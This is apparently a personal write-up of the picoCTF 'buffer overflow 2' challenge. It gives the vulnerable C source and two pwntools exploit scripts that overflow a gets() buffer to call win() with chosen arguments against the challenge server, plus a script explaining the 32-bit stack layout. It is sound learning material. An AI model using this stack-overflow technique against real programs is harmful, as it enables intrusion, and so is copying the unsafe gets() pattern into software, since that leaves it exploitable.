# buffer overflow 2-300pt
[The challenge is here](https://play.picoctf.org/practice/challenge/259?category=6&originalEvent=70&page=1)
## Problem

## Approach
The given source code is as follows:
```C=
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 100
#define FLAGSIZE 64

void win(unsigned int arg1, unsigned int arg2) {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt", "r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
           "own debugging flag.\n");
    exit(0);
  }

  fgets(buf, FLAGSIZE, f);
  if (arg1 != 0xCAFEF00D)
    return;
  if (arg2 != 0xF00DF00D)
    return;
  printf(buf);
}

void vuln() {
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv) {
  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}
```
As in the previous challenge, we use the buffer overflow to jump into win() and get the flag, but this time there are two extra parameters, arg1 and arg2. So after win()'s address we first put main()'s address as the return address and then stuff in the values of arg1 and arg2.
The earlier steps are the same as before, so I won't go through them again; just look at the pictures below.


Find the addresses of win() and main()

Putting it all together:
```python=
from pwn import *
# 112 bytes of padding reach the saved return address of vuln(), then:
# win() address, main() address as win()'s return address, arg1, arg2
payload = b'A'*112+p32(0x8049296)+p32(0x8049372)+p32(0xcafef00d)+p32(0xf00df00d)
```

Running it as a script:
```python=
from pwn import *
# padding + win() + main() as return address + arg1 + arg2
payload = b'A'*112+p32(0x8049296)+p32(0x8049372)+p32(0xcafef00d)+p32(0xf00df00d)
host = "saturn.picoctf.net"
port = 51315
p = remote(host, port)
#print(p.recvuntil(b'Please enter your string:').decode())
p.sendline(payload)
p.interactive()
p.close()
```
## Solution 2
After putting in win(), overflow the buffer by another 4 bytes, then fill in arg1 and arg2.

Running it as a script:
```python=
from pwn import *
# padding + win() + 4 filler bytes as win()'s return address + arg1 + arg2
payload = b'A'*112+p32(0x8049296)+b'B'*4+p32(0xcafef00d)+p32(0xf00df00d)
host = "saturn.picoctf.net"
port = 51315
p = remote(host, port)
#print(p.recvuntil(b'Please enter your string:').decode())
p.sendline(payload)
p.interactive()
p.close()
```
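As an added example (not code from the original writeup), the script below shows why both payloads work: on 32-bit x86, the function reached by `ret` treats the next dword on the stack as its return address and the dwords after that as arg1 and arg2. It rebuilds both payloads without pwntools and decodes them into the fields win() sees; the padding length, addresses and constants are those from the writeup.

```python
import struct

# Values from the writeup: 112 bytes of padding reach vuln()'s saved return
# address; the two addresses are this binary's win() and main().
PADDING = 112
WIN_ADDR = 0x8049296
MAIN_ADDR = 0x8049372
ARG1 = 0xCAFEF00D
ARG2 = 0xF00DF00D

def p32(value):
    """Little-endian 32-bit pack, the same thing pwntools' p32 does on x86."""
    return struct.pack("<I", value)

def build_frame(target, fake_ret, args, padding=PADDING):
    """Lay out the frame that a 32-bit cdecl function sees after `ret` lands
    in it: [padding][target][return address][arg1][arg2]...
    Solution 1 uses main() as the return address, solution 2 uses b'BBBB'."""
    return (b"A" * padding + p32(target) + p32(fake_ret)
            + b"".join(p32(a) for a in args))

def describe_frame(payload, padding=PADDING):
    """Decode a payload back into the fields win() observes: the word that
    replaced vuln()'s return address, then what win() sees at esp+0 (its
    return address), esp+4 (arg1) and esp+8 (arg2) on entry."""
    words = payload[padding:]
    names = ["target", "return_address", "arg1", "arg2"]
    fields = {}
    for i, name in enumerate(names):
        chunk = words[i * 4:(i + 1) * 4]
        if len(chunk) < 4:
            break  # truncated payload: later fields would be stack garbage
        fields[name] = struct.unpack("<I", chunk)[0]
    return fields

def win_checks_pass(fields):
    """Mirror the two comparisons in win(): both must hold to print the flag."""
    return fields.get("arg1") == ARG1 and fields.get("arg2") == ARG2

if __name__ == "__main__":
    for fake_ret in (MAIN_ADDR, 0x42424242):  # solution 1, solution 2
        frame = describe_frame(build_frame(WIN_ADDR, fake_ret, [ARG1, ARG2]))
        print({k: hex(v) for k, v in frame.items()}, win_checks_pass(frame))
```

Solution 2 passes the same checks; the difference is only that win() returns into 0x42424242 afterwards, so the process crashes after the flag has already been printed.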
## Difficulties
My first thought was method one, but locally I really have no idea why the flag file didn't come out Orz
The second method was of course from Google XD
Date : 2023/05/03
###### tags: `picoCTF2022` `Binary Exploitation` [`從零開始的 picoCTF`](https://hackmd.io/-KQeDuzrQMOcFNhwU_5eKA?both=) `picoCTF`